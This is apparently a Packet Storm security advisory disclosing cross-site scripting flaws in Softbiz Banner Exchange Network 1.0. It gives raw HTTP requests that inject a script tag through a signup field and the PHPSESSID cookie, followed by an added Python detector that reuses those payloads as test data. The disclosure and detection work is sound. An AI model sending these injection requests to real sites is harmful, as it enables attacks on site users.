softbiz10.txt

2006-07-02T00:00:00
ID PACKETSTORM:47915
Type packetstorm
Reporter Ellipsis Security
Modified 2006-07-02T00:00:00

Description

                                        
Softbiz Banner Exchange Network 1.0  
http://softbizscripts.com  
--------------------------  
Cross Site Scripting (XSS)  
--------------------------  
POST http://target.xx:80/insertmember.php HTTP/1.0  
Accept: */*  
Content-Type: application/x-www-form-urlencoded  
Host: target.xx  
Content-Length: 152  

uname=1&add=1&city="><script>alert(/Ellipsis+Security+Test/)</script>&state=1&country=0&url=http%3A%2F%2F&email=1&pwd=1&pwd2=1&submit=Signup  
---  
GET http://target.xx:80/lostpassword.php HTTP/1.0  
Accept: */*  
Host: target.xx  
Cookie: PHPSESSID="><script>alert(/Ellipsis+Security+Test/)</script>  
---  
GET http://target.xx:80/gen_confirm_mem.php HTTP/1.0  
Accept: */*  
Host: target.xx  
Cookie: PHPSESSID="><script>alert(/Ellipsis+Security+Test/)</script>  
---  
GET http://target.xx:80/index.php HTTP/1.0  
Accept: */*  
Host: target.xx  
Cookie: PHPSESSID="><script>alert(/Ellipsis+Security+Test/)</script>  
-----------------  
Ellipsis Security  
http://ellsec.org  
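
Added example, not part of the original advisory and not Softbiz code: a Python check that flags the two input patterns the requests above rely on, markup characters in a submitted form field and a PHPSESSID cookie outside the character set of PHP's default session ids. The function name, the shortened request copies and the benign session id are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# PHP's default session ids contain only these characters.
SESSION_ID_RE = re.compile(r"[A-Za-z0-9,-]+")
MARKUP_CHARS = set('<>"')  # enough to close an attribute and open a tag

def inspect_request(raw):
    """Return findings for one raw HTTP request (head, blank line, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    findings = []
    for line in head.split("\n")[1:]:  # skip the request line
        name, _, value = line.partition(":")
        if name.strip().lower() != "cookie":
            continue
        for pair in value.split(";"):
            key, _, val = pair.strip().partition("=")
            if key == "PHPSESSID" and not SESSION_ID_RE.fullmatch(val):
                findings.append("cookie PHPSESSID: not a valid session id")
    # Form fields are URL-decoded before the check, as the server sees them.
    for key, val in parse_qsl(body.strip(), keep_blank_values=True):
        if MARKUP_CHARS & set(val):
            findings.append(f"field {key}: contains HTML markup characters")
    return findings

# Constructed samples: the first two reuse the advisory's requests (shortened),
# the third is a benign request with a made-up session id.
PAYLOAD = '"><script>alert(/Ellipsis+Security+Test/)</script>'
SIGNUP = (
    "POST /insertmember.php HTTP/1.0\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    "Host: target.xx\n"
    "\n"
    f"uname=1&add=1&city={PAYLOAD}&state=1&country=0&url=http%3A%2F%2F&submit=Signup\n"
)
LOSTPW = f"GET /lostpassword.php HTTP/1.0\nHost: target.xx\nCookie: PHPSESSID={PAYLOAD}\n"
BENIGN = "GET /index.php HTTP/1.0\nHost: target.xx\nCookie: PHPSESSID=3f9c2a71b0d84e5f\n"

if __name__ == "__main__":
    for label, req in (("signup", SIGNUP), ("lostpassword", LOSTPW), ("benign", BENIGN)):
        print(label, inspect_request(req))
```

A request-side check like this is a detection aid; the fix in the application is to HTML-encode these values wherever the pages echo them.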